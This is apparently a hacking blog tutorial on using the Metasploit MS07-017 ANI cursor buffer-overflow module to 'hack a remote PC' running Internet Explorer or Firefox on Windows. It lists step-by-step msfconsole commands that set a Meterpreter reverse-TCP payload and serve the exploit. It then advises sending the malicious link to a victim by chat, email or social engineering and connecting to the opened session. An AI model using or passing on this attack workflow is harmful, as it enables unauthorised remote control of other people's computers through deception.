Hack Remote PC using Windows ANI Load AniIcon() Chunk Size Stack Buffer Overflow (HTTP)

This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.

Exploit Targets

(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista (default)

IE6 on Windows NT, 2000, XP, 2003 (all languages)

IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)

IE7 and Firefox on Windows Vista (all languages)

Firefox on Windows XP (English)

Firefox on Windows 2003 (English)


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

Msf exploit (ms07_017_ani_loadimage_chunksize)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms07_017_ani_loadimage_chunksize)>set lhost (IP of Local Host)

Msf exploit (ms07_017_ani_loadimage_chunksize)>set srvhost (This must be an address on the local machine)

Msf exploit (ms07_017_ani_loadimage_chunksize) set uripath loadimage (The Url to use for this exploit)

Msf exploit (ms07_017_ani_loadimage_chunksize)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Leave a Reply

Your email address will not be published. Required fields are marked *